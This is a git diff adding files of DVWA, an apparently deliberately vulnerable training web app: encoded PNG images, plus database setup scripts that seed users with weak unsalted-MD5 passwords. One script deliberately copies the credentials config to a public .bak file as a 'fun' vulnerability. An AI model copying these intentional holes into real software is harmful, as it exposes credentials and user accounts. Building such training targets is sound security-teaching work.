0000000000000000000000000000000000000000..5bc12b983a9dac74864ab05ca0b0914ccb8c5451 GIT binary patch literal 299 zcmV+`0o4A9P)haBbT*Pfxzw_08(c{DO=BMZln&TUQUh zjx^9s^bmc-*vn8M1LXVj%g~t8VrKbYzkic}@2~GR^aip--~IS~P)=t@OFvLEJ3BM? z?9usHT=&UNWACGv!2u53_O|8`pqbRLpQ~bK6tcS^kj__b+Umq0Ss=E)IrfULes@%ojunhI*#+5T500bU~RX56&*l%uJKe zU`Hl2vOS@`$PqaaxHHkfbfLHsWvQnh3OmcFf>b?DCaWw1N|Dc8~q+_Sqy@6s94~4AWXduu2=4;Q}7_{1vK3t<%}4p0WCa*N8+w$LXdF*cyw#w;qa66sAdw8KyamCt|iHsIG*7 zPT~(LQ1~zXIy8<44L}?Jgh@0J!48cfFZA9@fF`KBgU~4QMDNlhXrnn>gxt|PTLx%? r<{LsI$c=>dI#eJ5Jwb2pX5aq-d;o8GPOU;e00000NkvXXu0mjfcWq+Z literal 0 HcmV?d00001 diff --git a/DVWA/dvwa/images/login_logo.png b/DVWA/dvwa/images/login_logo.png new file mode 100644 index 0000000000000000000000000000000000000000..11c59f464248c8eb13331277f594814cc807b631 GIT binary patch literal 9088 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 KMNUMnLSTY2vD&}@ literal 0 HcmV?d00001 diff --git a/DVWA/dvwa/images/spanner.png b/DVWA/dvwa/images/spanner.png new file mode 100644 index 0000000000000000000000000000000000000000..efafbcff668ed4ccf7413e42f6b94a5370eb99b5 GIT binary patch literal 464 zcmV;>0WbcEP)TdclTv+cPBpl^P+9;opb(pzRcWr zG7(%vbj4<~^*w(4_`20iGn+kY{ZV(fRUQu z_*F8Uu10nP`U;ds=X4Yo7cb%WW#FSg|C*x%)ikZ#_m&iT3aFD&?i7zxq*080R?~G4 zPzFiSw1?6ty1S(T^PwI*zaotS)Nz)6)Q!$h%b%&LrmMkD9k@R!dyy8S%X-z__~ae!%$W@%Rp6K~{u~Mn*<%KzH-z_=>`CXhxB3VWWm&Y{3_QhhqM& zkphwPT!T1#ON6SctLf*@pZ>M?Sp-~*5XPssZ{L!?o;`cU;49Iq-i6SUCr>D}+S}V} zM8N~dJnvB6@?18X&5k8~Rm2NDOUvBcT-}#1UrJ$`3;91rdS_E|TEXoA0000EbWNgPPSPtU8WuBEHHx+a#>!z0$i_H)uY5Rb?6 zaB@s67JF?w3%!8vBIuX@CkU?tC>MP-s0IDNG7LR)99YkHDf9(dbpYeNQFs7Ug7;t& zMl>e|{2HbzFcAy|cfl)AhujaJGprd5?~{+$X$KI@Md+9!Ho|jRc*R|a+;(VN4gCSL zAS2iCnuW<9|UFGIFNVupO8MN81^U$t;k8#6aNy zrV?mpd`_h?UdcM`Sjw;+SP1u=B{7giU(C*og1!RG1Im3XyjGt=NmzmFpUF`z#Qo3Z6)x_`95N8dj&GuiNt^} zo!`M5=n5h^TnCirLx$Uoa8cCu8RenIF`SQ%&&(T<-EDTTop~Mf3tI0wpzmvn(irv@ zA}g{eHi59v#7-~?jE>g&M~COuY;LZ`gDf!K^uBh5tAeGIW{#w1uB}G0q6?LR@YKs z8L!~?VWk4-0J%AraUD3{&}&)94jqK4=0+)tXPknl@|tGb0~>mhZv$OJwRh3i&<+6u zZshiX3+{PXX_BKeE@|(>CouF z@IxFN&TloZjeK`%!CVi*DxrG3)1cao1m#1F;or1|)Ro%|Irl3(n{ar1LtP{BG?)HXZl}um-g-0r0Cv00000NkvXXu0mjfc6a4R literal 0 HcmV?d00001 diff --git a/DVWA/dvwa/images/warning.png b/DVWA/dvwa/images/warning.png new file mode 100644 index 0000000000000000000000000000000000000000..6c9e47055ac68977714c804c81ba0d799ea604d8 GIT binary patch literal 423 zcmV;Y0a*TtP)tZc1;&jXq_u^Je{73Le(6>KoY+iKO z*@2}c6?_(RqXf^Hnu2B%YBhaj`LD560fhpeOQlrM5i5RU{#4ASW|?(%v4>bqWJA@St?1jj)wkw{Q17ID|h>(}y ziGXSqy-X%UqtW1VXJ`7#)8Aro(PLwS!IerS+U+)a?&ZtNDrk$vpMo`lLAbkPaIIF0 zq1Eg9%B$~UTLKOafWc!N!r?I4Y?h&IZtCdv*VwdpV0IQ>UidoGG^tc749&8@FjVkS z%nSyPh5A_d-r=FX($uj9(G?JjK|JnHG^&GdBC3Ly0*{Please check the config file.
Database Error #" . mysqli_connect_errno() . ": " . mysqli_connect_error() . "." ); + if ($_DVWA[ 'db_user' ] == "root") { + dvwaMessagePush( 'Your database user is root, if you are using MariaDB, this will not work, please read the README.md file.' ); + } + dvwaPageReload(); +} + +// Create database +$drop_db = "DROP DATABASE IF EXISTS {$_DVWA[ 'db_database' ]};"; +if( !@mysqli_query($GLOBALS["___mysqli_ston"], $drop_db ) ) { + dvwaMessagePush( "Could not drop existing database
SQL: " . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) ); + dvwaPageReload(); +} + +$create_db = "CREATE DATABASE {$_DVWA[ 'db_database' ]};"; +if( !@mysqli_query($GLOBALS["___mysqli_ston"], $create_db ) ) { + dvwaMessagePush( "Could not create database
SQL: " . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) ); + dvwaPageReload(); +} +dvwaMessagePush( "Database has been created." ); + + +// Create table 'users' +if( !@((bool)mysqli_query($GLOBALS["___mysqli_ston"], "USE " . $_DVWA[ 'db_database' ])) ) { + dvwaMessagePush( 'Could not connect to database.' ); + dvwaPageReload(); +} + +$create_tb = "CREATE TABLE users (user_id int(6),first_name varchar(15),last_name varchar(15), user varchar(15), password varchar(32),avatar varchar(70), last_login TIMESTAMP, failed_login INT(3), PRIMARY KEY (user_id));"; +if( !mysqli_query($GLOBALS["___mysqli_ston"], $create_tb ) ) { + dvwaMessagePush( "Table could not be created
SQL: " . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) ); + dvwaPageReload(); +} +dvwaMessagePush( "'users' table was created." ); + + +// Insert some data into users +$base_dir= str_replace ("setup.php", "", $_SERVER['SCRIPT_NAME']); +$avatarUrl = $base_dir . 'hackable/users/'; + +$insert = "INSERT INTO users VALUES + ('1','admin','admin','admin',MD5('password'),'{$avatarUrl}admin.jpg', NOW(), '0'), + ('2','Gordon','Brown','gordonb',MD5('abc123'),'{$avatarUrl}gordonb.jpg', NOW(), '0'), + ('3','Hack','Me','1337',MD5('charley'),'{$avatarUrl}1337.jpg', NOW(), '0'), + ('4','Pablo','Picasso','pablo',MD5('letmein'),'{$avatarUrl}pablo.jpg', NOW(), '0'), + ('5','Bob','Smith','smithy',MD5('password'),'{$avatarUrl}smithy.jpg', NOW(), '0');"; +if( !mysqli_query($GLOBALS["___mysqli_ston"], $insert ) ) { + dvwaMessagePush( "Data could not be inserted into 'users' table
SQL: " . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) ); + dvwaPageReload(); +} +dvwaMessagePush( "Data inserted into 'users' table." ); + + +// Create guestbook table +$create_tb_guestbook = "CREATE TABLE guestbook (comment_id SMALLINT UNSIGNED NOT NULL AUTO_INCREMENT, comment varchar(300), name varchar(100), PRIMARY KEY (comment_id));"; +if( !mysqli_query($GLOBALS["___mysqli_ston"], $create_tb_guestbook ) ) { + dvwaMessagePush( "Table could not be created
SQL: " . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) ); + dvwaPageReload(); +} +dvwaMessagePush( "'guestbook' table was created." ); + + +// Insert data into 'guestbook' +$insert = "INSERT INTO guestbook VALUES ('1','This is a test comment.','test');"; +if( !mysqli_query($GLOBALS["___mysqli_ston"], $insert ) ) { + dvwaMessagePush( "Data could not be inserted into 'guestbook' table
SQL: " . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) ); + dvwaPageReload(); +} +dvwaMessagePush( "Data inserted into 'guestbook' table." ); + + + + +// Copy .bak for a fun directory listing vuln +$conf = DVWA_WEB_PAGE_TO_ROOT . 'config/config.inc.php'; +$bakconf = DVWA_WEB_PAGE_TO_ROOT . 'config/config.inc.php.bak'; +if (file_exists($conf)) { + // Who cares if it fails. Suppress. + @copy($conf, $bakconf); +} + +dvwaMessagePush( "Backup file /config/config.inc.php.bak automatically created" ); + +// Done +dvwaMessagePush( "Setup successful!" ); + +if( !dvwaIsLoggedIn()) + dvwaMessagePush( "Please login." ); +dvwaPageReload(); + +?> diff --git a/DVWA/dvwa/includes/DBMS/PGSQL.php b/DVWA/dvwa/includes/DBMS/PGSQL.php new file mode 100644 index 00000000..a50d4c37 --- /dev/null +++ b/DVWA/dvwa/includes/DBMS/PGSQL.php @@ -0,0 +1,105 @@ +Please check the config file." ); + dvwaPageReload(); +} + +// Create database +$drop_db = "DROP DATABASE IF EXISTS {$_DVWA[ 'db_database' ]};"; + +if( !@pg_query($drop_db) ) { + dvwaMessagePush( "Could not drop existing database
SQL: " . pg_last_error() ); + dvwaPageReload(); +} + +$create_db = "CREATE DATABASE {$_DVWA[ 'db_database' ]};"; + +if( !@pg_query ( $create_db ) ) { + dvwaMessagePush( "Could not create database
SQL: " . pg_last_error() ); + dvwaPageReload(); +} + +dvwaMessagePush( "Database has been created." ); + + +// Connect to server AND connect to the database +$dbconn = @pg_connect("host={$_DVWA[ 'db_server' ]} port={$_DVWA[ 'db_port' ]} dbname={$_DVWA[ 'db_database' ]} user={$_DVWA[ 'db_user' ]} password={$_DVWA[ 'db_password' ]}"); + + +// Create table 'users' + +$drop_table = "DROP TABLE IF EXISTS users;"; + +if( !pg_query($drop_table) ) { + dvwaMessagePush( "Could not drop existing users table
